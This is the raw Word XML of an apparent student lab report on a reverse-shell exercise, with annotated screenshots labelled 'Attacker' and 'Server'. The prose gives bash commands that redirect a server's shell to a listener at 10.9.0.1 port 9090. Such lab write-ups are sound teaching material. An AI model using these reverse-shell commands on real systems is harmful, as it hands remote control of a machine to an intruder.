                              <w:t>Attack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010635" id="Text Box 16" o:spid="_x0000_s1030" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:341.25pt;margin-top:66.8pt;width:77.95pt;height:34.6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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="79AF5D88" w14:textId="77777777" w:rsidR="005A0EE3" w:rsidRPr="002F0796" w:rsidRDefault="005A0EE3" w:rsidP="005A0EE3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4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32"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Attacker</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00DC092D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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A3189C4" wp14:editId="64DD293E">
            <wp:extent cx="5935345" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="825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9072"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5935345" cy="152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1DE2D2" w14:textId="41898D5E" w:rsidR="00DF3916" w:rsidRDefault="0004506C" w:rsidP="00DF3916">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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  <w:t>By following the instruction on Chapter 9 (</w:t>
      </w:r>
      <w:r w:rsidRPr="005C7A5D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Du, 2019)</w:t>
      </w:r>
      <w:r w:rsidR="00DF3916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>, I first redirect the standard output of the server to the attacker by using the following command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355E1C80" w14:textId="0440D7C5" w:rsidR="00DF3916" w:rsidRDefault="00DF3916" w:rsidP="00DF3916">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A260C8" w14:textId="77777777" w:rsidR="00DF3916" w:rsidRDefault="00DF3916">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA3143" w14:textId="77777777" w:rsidR="00364E35" w:rsidRDefault="00364E35" w:rsidP="00DF3916">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="494BF9EC" w14:textId="44F7A9AC" w:rsidR="00DF3916" w:rsidRDefault="00DF3916" w:rsidP="00DF3916">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF3916">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">fter that, I typed in </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ls</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command to list the files in server, but the output was shown in </w:t>
      </w:r>
      <w:r w:rsidRPr="00223B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">attacker’s terminal as shown in Figure </w:t>
      </w:r>
      <w:r w:rsidR="00223B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
      <w:r w:rsidRPr="00223B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7093AC63" w14:textId="7411EB3B" w:rsidR="00DF3916" w:rsidRPr="00F413ED" w:rsidRDefault="00DF3916" w:rsidP="00DF3916">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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223B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00223B26" w:rsidRPr="00223B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4941C1" w14:textId="7C13CF9E" w:rsidR="00DF3916" w:rsidRDefault="001F2C0D" w:rsidP="00DF3916">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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Redirecting the standard output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51CBE3F2" w14:textId="26A66D81" w:rsidR="00AE65FB" w:rsidRDefault="00E9007E" w:rsidP="00AE65FB">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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9C3B173" wp14:editId="46110271">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1489075</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3828627</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1456267" cy="491067"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="31" name="Text Box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56267" cy="49106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B3F2F93" w14:textId="1239C185" w:rsidR="00E9007E" w:rsidRPr="00E9007E" w:rsidRDefault="00E9007E">
                            <w:pPr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sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>Redirected outpu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9C3B173" id="Text Box 31" o:spid="_x0000_s1031" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:117.25pt;margin-top:301.45pt;width:114.65pt;height:38.65pt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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7B3F2F93" w14:textId="1239C185" w:rsidR="00E9007E" w:rsidRPr="00E9007E" w:rsidRDefault="00E9007E">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>Redirected outpu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A9785B5" wp14:editId="6E9763AC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>766233</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4015528</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="766234" cy="173567"/>
                <wp:effectExtent l="38100" t="19050" r="15240" b="74295"/>
                <wp:wrapNone/>
                <wp:docPr id="30" name="Straight Arrow Connector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66234" cy="173567"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="3810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9C4ADD3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30" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:60.35pt;margin-top:316.2pt;width:60.35pt;height:13.65pt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" strokecolor="red" strokeweight="3pt">
                <v:stroke endarrow="block" joinstyle="miter"/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08BFF74" wp14:editId="12F80F89">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2475865</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1314238</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1134533" cy="491067"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="29" name="Text Box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34533" cy="49106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EAB3972" w14:textId="1910597E" w:rsidR="00E9007E" w:rsidRPr="00E9007E" w:rsidRDefault="00E9007E">
                            <w:pPr>
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00E9007E">
                              <w:rPr>
                                <w:sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>Typed he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08BFF74" id="Text Box 29" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:194.95pt;margin-top:103.5pt;width:89.35pt;height:38.6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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3EAB3972" w14:textId="1910597E" w:rsidR="00E9007E" w:rsidRPr="00E9007E" w:rsidRDefault="00E9007E">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00E9007E">
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>Typed her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0B6B360" wp14:editId="110E5321">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2175934</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1111250</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="381000" cy="270933"/>
                <wp:effectExtent l="38100" t="38100" r="19050" b="34290"/>
                <wp:wrapNone/>
                <wp:docPr id="28" name="Straight Arrow Connector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381000" cy="270933"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="3810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F4878A0" id="Straight Arrow Connector 28" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:171.35pt;margin-top:87.5pt;width:30pt;height:21.35pt;flip:x y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" strokecolor="red" strokeweight="3pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F2C0D" w:rsidRPr="001F2C0D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214DEAB" wp14:editId="49C79B09">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4037965</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2372360</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="989965" cy="440055"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="17145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89965" cy="4400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3810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472ED322" w14:textId="77777777" w:rsidR="001F2C0D" w:rsidRPr="002F0796" w:rsidRDefault="001F2C0D" w:rsidP="001F2C0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32"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>Attack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14DEAB" id="Text Box 14" o:spid="_x0000_s1033" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:317.95pt;margin-top:186.8pt;width:77.95pt;height:34.6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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="472ED322" w14:textId="77777777" w:rsidR="001F2C0D" w:rsidRPr="002F0796" w:rsidRDefault="001F2C0D" w:rsidP="001F2C0D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4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32"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Attacker</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F2C0D" w:rsidRPr="001F2C0D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4EB589D" wp14:editId="43E025B1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3996267</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1051560</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="990177" cy="440055"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="17145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90177" cy="4400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3810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649870DE" w14:textId="77777777" w:rsidR="001F2C0D" w:rsidRPr="002F0796" w:rsidRDefault="001F2C0D" w:rsidP="001F2C0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40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002F0796">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>Serv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EB589D" id="Text Box 10" o:spid="_x0000_s1034" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:314.65pt;margin-top:82.8pt;width:77.95pt;height:34.6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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="649870DE" w14:textId="77777777" w:rsidR="001F2C0D" w:rsidRPr="002F0796" w:rsidRDefault="001F2C0D" w:rsidP="001F2C0D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40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002F0796">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Server</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F2C0D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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5536AC29" wp14:editId="76E69FA0">
            <wp:extent cx="5935345" cy="1388533"/>
            <wp:effectExtent l="0" t="0" r="0" b="254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1821"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5935345" cy="13885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1F2C0D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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44D58D7F" wp14:editId="0886B3BD">
            <wp:extent cx="5934604" cy="4580466"/>
            <wp:effectExtent l="0" t="0" r="9525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034"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5935345" cy="4581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AE65FB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br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC62A38" w14:textId="7EFE3015" w:rsidR="00DE58A0" w:rsidRDefault="00DE58A0" w:rsidP="00DE58A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto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lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">Then, </w:t>
      </w:r>
      <w:r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I commanded the server to also redirect the standard input by using the following </w:t>
      </w:r>
      <w:r w:rsidRPr="00034590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command (Figure </w:t>
      </w:r>
      <w:r w:rsidR="00034590">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00034590">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4E95FC" w14:textId="4A7F638D" w:rsidR="00DE58A0" w:rsidRDefault="00DE58A0" w:rsidP="00DE58A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="24292F"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAC99CF" w14:textId="675A045B" w:rsidR="00CE158D" w:rsidRPr="00F413ED" w:rsidRDefault="00CE158D" w:rsidP="00CE158D">
      <w:pPr>
        <w:spacing w:after="0" w:line="48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034590">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidR="00034590" w:rsidRPr="00034590">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9541D5" w14:textId="1B88AED3" w:rsidR="00CE158D" w:rsidRDefault="005D7EFA" w:rsidP="00CE158D">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00164C3A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CCFE4E5" wp14:editId="0521923C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2992120</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1403985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1134110" cy="490855"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="37" name="Text Box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34110" cy="49085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E6659A6" w14:textId="4603392A" w:rsidR="005D7EFA" w:rsidRPr="00E9007E" w:rsidRDefault="005D7EFA" w:rsidP="00164C3A">
                            <w:pPr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sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>Standard erro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CCFE4E5" id="Text Box 37" o:spid="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:235.6pt;margin-top:110.55pt;width:89.3pt;height:38.6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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4E6659A6" w14:textId="4603392A" w:rsidR="005D7EFA" w:rsidRPr="00E9007E" w:rsidRDefault="005D7EFA" w:rsidP="00164C3A">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:sz w:val="24"/>
                          <w:szCs w:val="32"/>
                        </w:rPr>
                        <w:t>Standard error</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00164C3A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2393F8E" wp14:editId="75CD9179">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2416598</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1465368</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="630767" cy="80434"/>
                <wp:effectExtent l="0" t="76200" r="17145" b="53340"/>
                <wp:wrapNone/>
                <wp:docPr id="36" name="Straight Arrow Connector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30767" cy="80434"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="3810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5F4D1C" id="Straight Arrow Connector 36" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:190.3pt;margin-top:115.4pt;width:49.65pt;height:6.35pt;flip:x y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" strokecolor="red" strokeweight="3pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F14CA" w:rsidRPr="001F14CA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E0699E6" wp14:editId="6891CF62">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4453467</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1416261</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="990177" cy="440055"/>
                <wp:effectExtent l="19050" t="19050" r="19685" b="17145"/>
                <wp:wrapNone/>
                <wp:docPr id="26" name="Text Box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90177" cy="4400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3810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4238331D" w14:textId="77777777" w:rsidR="001F14CA" w:rsidRPr="002F0796" w:rsidRDefault="001F14CA" w:rsidP="001F14C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40"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="002F0796">
                              <w:rPr>
                                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                                <w:sz w:val="32"/>
                                <w:szCs w:val="40"/>
                              </w:rPr>
                              <w:t>Serv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0699E6" id="Text Box 26" o:spid="_x0000_s1036" type="#_x0000_t202" style="position:absolute;margin-left:350.65pt;margin-top:111.5pt;width:77.95pt;height:34.6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" fillcolor="white [3201]" strokecolor="red" strokeweight="3pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4238331D" w14:textId="77777777" w:rsidR="001F14CA" w:rsidRPr="002F0796" w:rsidRDefault="001F14CA" w:rsidP="001F14CA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40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002F0796">
                        <w:rPr>
                          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          <w:sz w:val="32"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                        <w:t>Server</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00CE158D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Redirecting the standard</w:t>
      </w:r>
      <w:r w:rsidR="009B52D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> output and</w:t>
      </w:r>
      <w:r w:rsidR="00CE158D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> input</w:t>
      </w:r>
      <w:r w:rsidR="00C127DC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w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37912FFA" wp14:editId="3CCDC56F">
            <wp:extent cx="5935345" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="23" name="Picture 23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Picture 23" descr="Text&#10;&#10;Description automatically generated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0618"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5935345" cy="1447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171FC0" w14:textId="49B25725" w:rsidR="00AE65FB" w:rsidRDefault="00164C3A" w:rsidP="00C127DC">
      <w:pPr>
        <w:spacing w:after="0" w:line="480" w:lineRule="auto"/>
        <w:jc w:val="center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164C3A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EC4064A" wp14:editId="74768CAD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4322233</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3422862</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="613834" cy="180128"/>
                <wp:effectExtent l="19050" t="57150" r="15240" b="29845"/>
                <wp:wrapNone/>
                <wp:docPr id="34" name="Straight Arrow Connector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13834" cy="180128"/>
                        </a:xfrm>
                        <a:prstGeom prst="straightConnector1">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="3810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E0ECDD" id="Straight Arrow Connector 34" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;margin-left:340.35pt;margin-top:269.5pt;width:48.35pt;height:14.2pt;flip:x y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" strokecolor="red" strokeweight="3pt">
                <v:stroke endarrow="block" joinstyle="miter"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00164C3A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93C231E" wp14:editId="02FFBB6B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4478655</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3577590</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1489922" cy="491067"/>
                <wp:effectExtent l="0" t="0" r="0" b="4445"/>
                <wp:wrapNone/>
                <wp:docPr id="35" name="Text Box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9922" cy="49106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9571880" w14:textId="77777777" w:rsidR="00164C3A" w:rsidRPr="00E9007E" w:rsidRDefault="00164C3A" w:rsidP="00164C3A">
                            <w:pPr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sz w:val="24"/>
                                <w:szCs w:val="32"/>
                              </w:rPr>
                              <w:t>Redirected outpu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93C231E" id="Text Box 35" o:spid="_x0000_s1037" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:352.65pt;margin-top:281.7pt;width:117.3pt;height:38.65pt;z-index:251683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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
